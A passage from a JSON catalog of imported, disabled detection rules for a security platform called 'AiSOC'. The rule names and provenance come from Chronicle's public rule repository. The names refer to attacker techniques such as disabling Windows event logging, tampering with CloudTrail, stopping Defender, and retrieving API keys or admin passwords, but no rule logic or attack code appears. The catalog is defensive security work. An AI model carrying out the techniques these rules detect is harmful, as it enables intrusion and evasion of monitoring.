yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "appinit_dll_hijacking_sysmon_behaviour", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/appinit_dll_hijacking__sysmon_behaviour.yaral" } }, { "id": "chronicle-detection-rules-apt-user-agent", "type": "detection", "name": "apt_user_agent", "description": "apt_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/apt_user_agent.yaral" } }, { "id": "chronicle-detection-rules-apt10-behavior", "type": "detection", "name": "apt10_behavior", "description": "apt10_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt10-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "apt10_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/apt10_behavior.yaral" } }, { "id": "chronicle-detection-rules-apt28-zekapab-zebrocy-implant-sysmon-firewall-proxy", "type": "detection", "name": "apt28_zekapab_zebrocy_implant__sysmon_firewall_proxy", "description": "apt28_zekapab_zebrocy_implant__sysmon_firewall_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt28-zekapab-zebrocy-implant-sysmon-firewall-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt28_zekapab_zebrocy_implant__sysmon_firewall_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/apt28_zekapab_zebrocy_implant__sysmon_firewall_proxy.yaral" } }, { "id": "chronicle-detection-rules-apt28-zekapabzebrocycannon-implant-sysmonfirewallproxy-part2", "type": "detection", "name": "apt28_zekapabzebrocycannon_implant_sysmonfirewallproxy_part2", "description": "apt28_zekapabzebrocycannon_implant_sysmonfirewallproxy_part2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt28-zekapabzebrocycannon-implant-sysmonfirewallproxy-part2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt28_zekapabzebrocycannon_implant_sysmonfirewallproxy_part2", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/apt28_zekapab_zebrocy_cannon_implant__sysmon_firewall_proxy___part_2.yaral" } }, { "id": "chronicle-detection-rules-apt29", "type": "detection", "name": "apt29", "description": "apt29", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt29.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt29", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/apt29_part_1.yaral" } }, { "id": "chronicle-detection-rules-apt29-part-1", "type": "detection", "name": "apt29_part_1", "description": "apt29_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt29-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt29_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/apt29_part_2.yaral" } }, { "id": "chronicle-detection-rules-apt33-remcos-sysmon-behavior-historic-indicators", "type": "detection", "name": "apt33_remcos_sysmon_behavior_historic_indicators", "description": "apt33_remcos_sysmon_behavior_historic_indicators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt33-remcos-sysmon-behavior-historic-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt33_remcos_sysmon_behavior_historic_indicators", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/apt33_remcos__sysmon_behavior___historic_indicators.yaral" } }, { "id": "chronicle-detection-rules-apt40-dropbox-tool-user-agent", "type": "detection", "name": "apt40_dropbox_tool_user_agent", "description": "apt40_dropbox_tool_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt40-dropbox-tool-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt40_dropbox_tool_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/apt40_dropbox_tool_user_agent.yaral" } }, { "id": "chronicle-detection-rules-atlassian-confluence-download-attachments-remote-code-executiondirectory-travers", "type": "detection", "name": "atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal", "description": "atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/atlassian-confluence-download-attachments-remote-code-executiondirectory-travers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/proxy/atlassian_confluence_download_attachments_remote_code_execution_directory_traversal.yaral" } }, { "id": "chronicle-detection-rules-attempt-to-disable-windows-events-logging-via-registry", "type": "detection", "name": "attempt_to_disable_windows_events_logging_via_registry", "description": "attempt_to_disable_windows_events_logging_via_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/attempt-to-disable-windows-events-logging-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "attempt_to_disable_windows_events_logging_via_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/attempt_to_disable_windows_events_logging__via_registry.yaral" } }, { "id": "chronicle-detection-rules-attempts-to-stop-windows-defender-and-windows-updates", "type": "detection", "name": "attempts_to_stop_windows_defender_and_windows_updates", "description": "attempts_to_stop_windows_defender_and_windows_updates", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/attempts-to-stop-windows-defender-and-windows-updates.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "attempts_to_stop_windows_defender_and_windows_updates", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/attempts_to_stop_windows_defender_and_windows_updates.yaral" } }, { "id": "chronicle-detection-rules-avg-antivirus-avast-antivirus-dll-search-order-hijacking-and-potential-abuses", "type": "detection", "name": "avg_antivirus__avast_antivirus_dll_search_order_hijacking_and_potential_abuses", "description": "avg_antivirus__avast_antivirus_dll_search_order_hijacking_and_potential_abuses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/avg-antivirus-avast-antivirus-dll-search-order-hijacking-and-potential-abuses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "avg_antivirus__avast_antivirus_dll_search_order_hijacking_and_potential_abuses", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/avg_antivirus___avast_antivirus_dll_search_order_hijacking_and_potential_abuses.yaral" } }, { 
"id": "chronicle-detection-rules-aws-account-leaving-or-removed-from-organization", "type": "detection", "name": "aws_account_leaving_or_removed_from_organization", "description": "aws_account_leaving_or_removed_from_organization", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-account-leaving-or-removed-from-organization.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_account_leaving_or_removed_from_organization", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_account_leaving_or_removed_from_organization.yaral" } }, { "id": "chronicle-detection-rules-aws-alb-insecure-ssl-policy", "type": "detection", "name": "aws_alb_insecure_ssl_policy", "description": "aws_alb_insecure_ssl_policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-alb-insecure-ssl-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_alb_insecure_ssl_policy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_alb_insecure_ssl_policy.yaral" } }, { "id": "chronicle-detection-rules-aws-api-call-outside-of-organization", "type": "detection", "name": "aws_api_call_outside_of_organization", "description": "aws_api_call_outside_of_organization", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-api-call-outside-of-organization.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_api_call_outside_of_organization", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_api_call_outside_of_organization.yaral" } }, { "id": "chronicle-detection-rules-aws-api-gateway-get-keys", "type": "detection", "name": "aws_api_gateway_get_keys", "description": "aws_api_gateway_get_keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-api-gateway-get-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_api_gateway_get_keys", "source_commit": "74dd490", 
"license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_api_gateway_get_keys.yaral" } }, { "id": "chronicle-detection-rules-aws-backup-plan-deleted", "type": "detection", "name": "aws_backup_plan_deleted", "description": "aws_backup_plan_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-backup-plan-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_backup_plan_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_backup_plan_deleted.yaral" } }, { "id": "chronicle-detection-rules-aws-cloudfront-insecure-ssl-policy", "type": "detection", "name": "aws_cloudfront_insecure_ssl_policy", "description": "aws_cloudfront_insecure_ssl_policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-cloudfront-insecure-ssl-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_cloudfront_insecure_ssl_policy", "source_commit": 
"74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_cloudfront_insecure_ssl_policy.yaral" } }, { "id": "chronicle-detection-rules-aws-cloudtrail-logging-tampered", "type": "detection", "name": "aws_cloudtrail_logging_tampered", "description": "aws_cloudtrail_logging_tampered", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-cloudtrail-logging-tampered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_cloudtrail_logging_tampered", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_cloudtrail_logging_tampered.yaral" } }, { "id": "chronicle-detection-rules-aws-config-service-modified", "type": "detection", "name": "aws_config_service_modified", "description": "aws_config_service_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-config-service-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"aws_config_service_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_config_service_modified.yaral" } }, { "id": "chronicle-detection-rules-aws-console-login-without-mfa", "type": "detection", "name": "aws_console_login_without_mfa", "description": "aws_console_login_without_mfa", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-console-login-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_console_login_without_mfa", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_console_login_without_mfa.yaral" } }, { "id": "chronicle-detection-rules-aws-delete-cloudwatch-log-group", "type": "detection", "name": "aws_delete_cloudwatch_log_group", "description": "aws_delete_cloudwatch_log_group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-delete-cloudwatch-log-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "aws_delete_cloudwatch_log_group", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_delete_cloudwatch_log_group.yaral" } }, { "id": "chronicle-detection-rules-aws-delete-vpc-flow-logs", "type": "detection", "name": "aws_delete_vpc_flow_logs", "description": "aws_delete_vpc_flow_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-delete-vpc-flow-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_delete_vpc_flow_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_delete_vpc_flow_logs.yaral" } }, { "id": "chronicle-detection-rules-aws-ec2-ami-or-snapshot-shared-publicly", "type": "detection", "name": "aws_ec2_ami_or_snapshot_shared_publicly", "description": "aws_ec2_ami_or_snapshot_shared_publicly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ec2-ami-or-snapshot-shared-publicly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ec2_ami_or_snapshot_shared_publicly", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ec2_ami_or_snapshot_shared_publicly.yaral" } }, { "id": "chronicle-detection-rules-aws-ec2-get-windows-admin-password", "type": "detection", "name": "aws_ec2_get_windows_admin_password", "description": "aws_ec2_get_windows_admin_password", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ec2-get-windows-admin-password.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ec2_get_windows_admin_password", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ec2_get_windows_admin_password.yaral" } }, { "id": "chronicle-detection-rules-aws-ec2-high-number-of-api-calls", "type": "detection", "name": "aws_ec2_high_number_of_api_calls", "description": "aws_ec2_high_number_of_api_calls", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ec2-high-number-of-api-calls.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ec2_high_number_of_api_calls", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ec2_high_number_of_api_calls.yaral" } }, { "id": "chronicle-detection-rules-aws-ec2-user-data-modified", "type": "detection", "name": "aws_ec2_user_data_modified", "description": "aws_ec2_user_data_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ec2-user-data-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ec2_user_data_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ec2_user_data_modified.yaral" } }, { "id": "chronicle-detection-rules-aws-enable-disable-region", "type": "detection", "name": "aws_enable_disable_region", "description": "aws_enable_disable_region", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-enable-disable-region.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_enable_disable_region", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_enable_disable_region.yaral" } }, { "id": "chronicle-detection-rules-aws-excessive-successful-discovery-events", "type": "detection", "name": "aws_excessive_successful_discovery_events", "description": "aws_excessive_successful_discovery_events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-excessive-successful-discovery-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_excessive_successful_discovery_events", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_excessive_successful_discovery_events.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-black-hole-traffic-detected", "type": "detection", "name": "aws_guardduty_black_hole_traffic_detected", "description": "aws_guardduty_black_hole_traffic_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", 
"tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-black-hole-traffic-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_black_hole_traffic_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_black_hole_traffic_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-brute-force-activity-detected", "type": "detection", "name": "aws_guardduty_brute_force_activity_detected", "description": "aws_guardduty_brute_force_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-brute-force-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_brute_force_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_brute_force_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-command-and-control-activity-detected", "type": "detection", "name": "aws_guardduty_command_and_control_activity_detected", "description": "aws_guardduty_command_and_control_activity_detected", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-command-and-control-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_command_and_control_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_command_and_control_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-crypto-currency-activity-detected", "type": "detection", "name": "aws_guardduty_crypto_currency_activity_detected", "description": "aws_guardduty_crypto_currency_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-crypto-currency-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 